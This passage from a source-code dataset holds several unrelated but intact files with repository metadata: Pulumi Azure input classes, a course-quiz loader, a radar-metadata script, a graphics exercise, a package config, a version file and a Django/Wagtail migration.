number = (2**m) * (3**n)
if 400_000_000 <= number <= 600_000_000:
print(number) | [
"[email protected]"
] | |
d7b3582b4c52e7fb88539c13be1c092caeaff812 | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/mixedreality/_inputs.py | e3ee76ba7c0e562f01879921a0d3d73612de3188 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,326 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from ._enums import *
__all__ = [
'IdentityArgs',
'ObjectAnchorsAccountIdentityArgs',
'SkuArgs',
]
@pulumi.input_type
class IdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None):
"""
Identity for the resource.
:param pulumi.Input['ResourceIdentityType'] type: The identity type.
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
"""
The identity type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ObjectAnchorsAccountIdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None):
"""
:param pulumi.Input['ResourceIdentityType'] type: The identity type.
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
"""
The identity type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class SkuArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
capacity: Optional[pulumi.Input[int]] = None,
family: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[str]] = None,
tier: Optional[pulumi.Input['SkuTier']] = None):
"""
The resource model definition representing SKU
:param pulumi.Input[str] name: The name of the SKU. Ex - P3. It is typically a letter+number code
:param pulumi.Input[int] capacity: If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
:param pulumi.Input[str] family: If the service has different generations of hardware, for the same SKU, then that can be captured here.
:param pulumi.Input[str] size: The SKU size. When the name field is the combination of tier and some other value, this would be the standalone code.
:param pulumi.Input['SkuTier'] tier: This field is required to be implemented by the Resource Provider if the service has more than one tier, but is not required on a PUT.
"""
pulumi.set(__self__, "name", name)
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if family is not None:
pulumi.set(__self__, "family", family)
if size is not None:
pulumi.set(__self__, "size", size)
if tier is not None:
pulumi.set(__self__, "tier", tier)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the SKU. Ex - P3. It is typically a letter+number code
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def capacity(self) -> Optional[pulumi.Input[int]]:
"""
If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
"""
return pulumi.get(self, "capacity")
@capacity.setter
def capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "capacity", value)
@property
@pulumi.getter
def family(self) -> Optional[pulumi.Input[str]]:
"""
If the service has different generations of hardware, for the same SKU, then that can be captured here.
"""
return pulumi.get(self, "family")
@family.setter
def family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "family", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The SKU size. When the name field is the combination of tier and some other value, this would be the standalone code.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tier(self) -> Optional[pulumi.Input['SkuTier']]:
"""
This field is required to be implemented by the Resource Provider if the service has more than one tier, but is not required on a PUT.
"""
return pulumi.get(self, "tier")
@tier.setter
def tier(self, value: Optional[pulumi.Input['SkuTier']]):
pulumi.set(self, "tier", value)
| [
"[email protected]"
] | |
ce92586470483837f6477b0a75a40dce98aa8f9a | a652f89c88fcecb3aa665cf20212064049e9a16f | /models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence/ai_elective_questions.py | c7a2b24914c91838a6347b4bcede3ccf62a582a8 | [] | no_license | princelewis/Elective-Course-Recommender-System | cba3743d914a664145fda3ae060f4cf80bdfbbed | 9e5f165878f7521ce8967c72daa8b538252d0ae8 | refs/heads/master | 2020-05-19T08:19:39.793382 | 2019-03-29T11:50:00 | 2019-03-29T11:50:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,679 | py | # Importing required modules
import pandas as pd
from models.aos_questions_and_answer.dataset.elective_courses_questions.artificial_intelligence \
.procesing_ai_elective_courses import \
Util
# Initializing variables
ai_correct = 0
ai_failed = 0
se_correct = 0
se_failed = 0
cn_correct = 0
cn_failed = 0
sye_correct = 0
sye_failed = 0
tc_correct = 0
tc_failed = 0
AI = []
SE = []
CN = []
SYE = []
TC = []
final_scores = []
current_question_number = 0
ai_total_questions = 0
# Reading the CSV file that contains all compiled questions with respective answers
# models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence
# /ai_elective_courses_questions.csv
dataset = pd.read_csv(
'models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence'
'/ai_elective_courses_questions.csv')
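# Each course occupies a pair of adjacent CSV columns (questions, then the
# matching answers), which is why every block below slices two columns at a time
# with .iloc.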
# COS833
cos_833_questions = dataset.iloc[1:, :1].values
cos_833_answers = dataset.iloc[1:, 1].values
cos_833_list_of_dictionaries_of_questions_and_answers = Util.processed_list_dict(cos_833_questions, cos_833_answers)
cos_833_selected_six_random = Util.select_six_random(cos_833_list_of_dictionaries_of_questions_and_answers)
# COS816
cos_816_questions = dataset.iloc[1:, 2:3].values
cos_816_answers = dataset.iloc[1:, 3].values
cos_816_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_816_questions, cos_816_answers)
cos_816_selected_six_random = Util.select_six_random(cos_816_list_of_dictionaries_of_questions_and_answers)
# COS830
cos_830_questions = dataset.iloc[1:, 4:5].values
cos_830_answers = dataset.iloc[1:, 5].values
cos_830_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_830_questions, cos_830_answers)
cos_830_selected_six_random = Util.select_six_random(cos_830_list_of_dictionaries_of_questions_and_answers)
# COS836
cos_836_questions = dataset.iloc[1:, 6:7].values
cos_836_answers = dataset.iloc[1:, 7].values
cos_836_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_836_questions, cos_836_answers)
cos_836_selected_six_random = Util.select_six_random(cos_836_list_of_dictionaries_of_questions_and_answers)
# COS834
cos_834_questions = dataset.iloc[1:, 8:9].values
cos_834_answers = dataset.iloc[1:, 9].values
cos_834_list_of_dictionaries_of_questions_and_answers = \
    Util.processed_list_dict(cos_834_questions, cos_834_answers)
cos_834_selected_six_random = Util.select_six_random(cos_834_list_of_dictionaries_of_questions_and_answers)
# COS838
cos_838_questions = dataset.iloc[1:, 10:11].values
cos_838_answers = dataset.iloc[1:, 11].values
cos_838_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_838_questions, cos_838_answers)
cos_838_selected_six_random = Util.select_six_random(cos_838_list_of_dictionaries_of_questions_and_answers)
# Getting total questions and answers to be asked for every user
ai_total_questions_and_answer = Util.all_selected_questions_with_answers(cos_833_selected_six_random,
cos_816_selected_six_random,
cos_830_selected_six_random,
cos_836_selected_six_random,
cos_834_selected_six_random,
cos_838_selected_six_random)
# print(total_questions_and_answer)
for i in ai_total_questions_and_answer.values():
for j in i:
ai_total_questions += 1
| [
"[email protected]"
] | |
9d449527cdaa26e79a17950d62dcc6a2bdc7d18c | 34f1b1fc2fbca6b61858a83cbdf498fe99648209 | /scripts/create_metadata.py | 7da66e6aad7430fd22dfd617cee183a90212288c | [
"Apache-2.0"
] | permissive | firth/radcomp | 88a97b2918b3e0683d181085d10e3f8a78549e93 | a855a66189b1d7867a6c373d3fdc6ce67f6d3c01 | refs/heads/master | 2020-12-25T02:25:32.772407 | 2020-10-07T02:43:18 | 2020-10-07T02:43:18 | 41,178,899 | 0 | 0 | null | 2020-10-07T02:43:19 | 2015-08-21T21:49:04 | Python | UTF-8 | Python | false | false | 2,840 | py | """ Create the auxillary JSON metadata that goes with this production
{"meta": {"vcp": 212, "product": "N0Q", "valid": "2014-06-25T20:43:55Z",
"site": "DMX"}}
This magic requires that some modifications were done to nex2img to get this
information included in the GEMPAK log file
--- a/gempak/source/programs/upc/programs/nex2img/nex2img.f
+++ b/gempak/source/programs/upc/programs/nex2img/nex2img.f
@@ -221,7 +221,7 @@ C
IF (ierf.eq.0) THEN
viewable = .true.
ifile = 1
-
+ write(*, *) 'Searching radar: ', stid
CALL ST_RPST(tpath,'%SITE%',stid,ipos,
+ outstr, ier)
CALL ST_RPST(outstr,'%PROD%',gfunc,ipos,
@@ -256,6 +256,7 @@ C
radproj = 'RAD|D'
radarea = 'dset'
idrpfl = 0
+ write(*, *) 'Using image: ', imgfls
CALL GG_MAPS ( radproj, radarea, imgfls,
+ idrpfl, ier )
C
"""
import json
import sys
import os
import datetime
import tempfile
import subprocess
def main():
"""Go Main Go."""
sector = sys.argv[1]
ts = datetime.datetime(
int(sys.argv[2]),
int(sys.argv[3]),
int(sys.argv[4]),
int(sys.argv[5]),
int(sys.argv[6]),
)
utcnow = datetime.datetime.utcnow()
seconds = (utcnow - ts).days * 86400.0 + (utcnow - ts).seconds
if seconds > 300:
sys.exit()
prod = sys.argv[7]
job = sys.argv[9]
starttime = datetime.datetime.strptime(sys.argv[8], "%Y%m%d%H%M%S")
utcnow = datetime.datetime.utcnow()
radars = 0
used = 0
logfn = "logs/nex2img_%s_%s_%s.log" % (sector, prod, job)
if os.path.isfile(logfn):
for line in open(logfn):
if line.find("Searching radar:") > 0:
radars += 1
elif line.find("Using image:") > 0:
used += 1
else:
print(f"create_metadata log file {logfn} missing")
res = {
"meta": {
"vcp": None,
"product": prod,
"site": "%sCOMP" % (sector,),
"valid": ts.strftime("%Y-%m-%dT%H:%M:%SZ"),
"processing_time_secs": (utcnow - starttime).seconds,
"radar_quorum": "%s/%s" % (used, radars),
}
}
(tmpfp, tmpfn) = tempfile.mkstemp()
os.write(tmpfp, json.dumps(res).encode("utf-8"))
os.close(tmpfp)
cmd = (
"pqinsert -p 'gis r %s gis/images/4326/%sCOMP/%s_ bogus json' %s"
) % (ts.strftime("%Y%m%d%H%M"), sector, prod.lower(), tmpfn)
subprocess.call(cmd, shell=True)
os.unlink(tmpfn)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
5272cd23752277cc1560b83a7879696d5c876c27 | f7aac490b6bdda8a49a6d14534ef733e2cd34bcc | /Code for 1.10.2018/drawCircleXYMove-wrap.py | c3af761110a39aa3ca365c1e84745d4026d2937b | [] | no_license | nmessa/Stratham-Girls-Coding-Club | 67c203fa88f62f2603b62a0d0fd50135a03f69dc | 1bc786b6c794cc3159ed72be25130f9452fb23f6 | refs/heads/master | 2021-05-06T18:01:14.349667 | 2019-03-12T15:26:57 | 2019-03-12T15:26:57 | 111,935,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | ## Draw Circle
## Author: nmessa
## Draws a circle moving in X and Y direction
## wraps around when it gets to the edge of the screen
from graphics import *
import time
def main():
height = 640
width = 640
radius = 50
    #Create a window to draw in
win = GraphWin('Circle Move XY with wraparound', width, height)
win.setBackground('white')
#Define a circle to draw
shape = Circle(Point(0, 0), radius)
#set the drawing parameters
shape.setOutline("red")
shape.setFill("green")
shape.setWidth(10)
#draw the circle in the window
shape.draw(win)
dx = 10
dy = 10
while True:
#Add code here
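        # Illustrative completion, not the original author's solution: move the
        # circle by (dx, dy) each frame and wrap it to the opposite edge once it
        # has fully left the window; click the window to stop. getCenter(), move()
        # and checkMouse() come from Zelle's graphics.py (remove the checkMouse()
        # test if your copy of graphics.py does not provide it).
        shape.move(dx, dy)
        center = shape.getCenter()
        if center.getX() - radius > width:
            shape.move(-(width + 2 * radius), 0)
        if center.getY() - radius > height:
            shape.move(0, -(height + 2 * radius))
        if win.checkMouse() is not None:
            break
        time.sleep(0.05)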
time.sleep(3)
win.close()
main()
| [
"[email protected]"
] | |
198e9d1ccf06652376cec667659e83c694b12771 | 3d1ee3ddb516f0b499f6272fbc7fbd6eefb88a63 | /jpackages/oss/1.0/actions/process.configure.py | a26799fc2992b053ec26cda45d6f47eafac6c365 | [] | no_license | despiegk/jp_serverapps | e72005004273db9dc01d1e64ddfcb28d06137f1f | 82ecc0b56ac85b2fb2d1eb02a80ab4ac99026f47 | refs/heads/master | 2016-09-06T16:06:39.529847 | 2014-08-17T10:17:03 | 2014-08-17T10:17:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,243 | py | def main(j,jp):
pass
#configure the application to autostart
# jp.log("set autostart $(jp.name)")
#numprocesses: if more than 1 process, will be started in tmux as $name_$nr
#ports: tcpports
#autostart: does this app start auto
#stopcmd: if special command to stop
#check: check app to see if its running
#stats: gather statistics by process manager
#timeoutcheck: how long do we wait to see if app active
#isJSapp: to tell system if process will self register to redis (is jumpscale app)
# pd=j.tools.startupmanager.addProcess(\
# name=jp.name,\
# cmd="python", \
# args="portal_start.py",\
# env={},\
# numprocesses=1,\
# priority=100,\
# shell=False,\
# workingdir='$base/apps/oss',\
# jpackage=jp,\
# domain="solutions",\
# ports=[82],\
# autostart=True,\
# reload_signal=0,\
# user="root",\
# log=True,\
# stopcmd=None,\
# check=True,\
# timeoutcheck=10,\
# isJSapp=1,\
# upstart=False,\
# stats=False,\
# processfilterstr="")#what to look for when doing ps ax to find the process
# pd.start()
| [
"[email protected]"
] | |
af35d9e3ecf3fb8d84581752c65f3cf3e9dc1c7d | 237db09490a4fc5976e6f8a8eb783b928bde1cac | /lib/exabgp/version.py | 3ea942e734182c2966ab29fa48eb5abce8e67786 | [] | no_license | brijohn/exabgp | c80a348035ff104b8d9e9c44ae07f97bf8e33728 | 788bde2842f2c2bc22580d0641003f2e93ff56ac | refs/heads/master | 2020-12-25T17:56:51.444190 | 2017-05-30T16:14:59 | 2017-05-30T16:14:59 | 65,487,232 | 0 | 0 | null | 2016-08-11T17:11:12 | 2016-08-11T17:11:12 | null | UTF-8 | Python | false | false | 245 | py | import os
release = "4.0.0-0478a014"
json = "4.0.0"
text = "4.0.0"
version = os.environ.get('EXABGP_VERSION',release)
# Do not change the first line as it is parsed by scripts
if __name__ == '__main__':
import sys
sys.stdout.write(version)
| [
"[email protected]"
] | |
c204c0ca912de6b8876285198e54ba6d72afbf93 | eb93b37c5a76ef09c967ecfd32dc77f0a0e75bef | /article/migrations/0003_auto_20190712_1558.py | 081657f7d7bbbd5e642424535d10296f6309e9ec | [] | no_license | uktrade/data-hub-helpcentre | 9a58d466b264ccdaafea12576039dcf8f2c19015 | 74f741345df3b35164f6d4c1f17bc56c709a4662 | refs/heads/master | 2023-08-16T22:36:14.704989 | 2023-08-15T08:58:10 | 2023-08-15T08:58:10 | 199,607,056 | 4 | 2 | null | 2023-08-15T08:58:12 | 2019-07-30T08:15:54 | CSS | UTF-8 | Python | false | false | 696 | py | # Generated by Django 2.2.3 on 2019-07-12 15:58
import wagtail.blocks
import wagtail.fields
import wagtail.images.blocks
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("article", "0002_auto_20190712_1537"),
]
operations = [
migrations.AlterField(
model_name="articlepage",
name="body",
field=wagtail.fields.StreamField(
[
("paragraph", wagtail.blocks.RichTextBlock()),
("image", wagtail.images.blocks.ImageChooserBlock()),
],
blank=True,
null=True,
),
),
]
| [
"[email protected]"
] |